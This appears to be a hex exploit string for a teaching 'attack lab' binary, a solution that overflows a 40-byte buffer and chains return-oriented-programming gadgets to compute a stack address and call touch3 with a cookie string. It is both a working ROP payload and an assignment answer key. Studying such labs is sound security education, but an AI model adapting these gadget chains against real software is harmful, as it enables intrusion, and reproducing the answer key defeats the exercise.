FF FF FF FF FF FF FF FF  /*  40 byte buffer  */
FF FF FF FF FF FF FF FF  /*  buffer  */
FF FF FF FF FF FF FF FF  /*  buffer  */
FF FF FF FF FF FF FF FF  /*  buffer  */
FF FF FF FF FF FF FF FF  /*  buffer  */
AD 1A 40 00 00 00 00 00  /*  moves %rsp to %rax  */
C5 19 40 00 00 00 00 00  /*  moves %rax to %rdi  */
CC 19 40 00 00 00 00 00  /*  pops %rax  */
48 00 00 00 00 00 00 00  /*  offset for %rsp to cookie string  */
DD 19 40 00 00 00 00 00  /*  moves 32 byte registers %eax to %edx  */
70 1A 40 00 00 00 00 00  /*  moves 32 byte registers %edx to %ecx  */
13 1A 40 00 00 00 00 00  /*  moves 32 byte registers %ecx to %esi  */
D6 19 40 00 00 00 00 00  /*  lea %rdi,%rsi, 1), %rax  */
C5 19 40 00 00 00 00 00  /*  moves %rax to %rdi  */
FA 18 40 00 00 00 00 00  /*  touch3 address  */
35 39 62 39 39 37 66 61  /*  cookie string passed to touch3  */


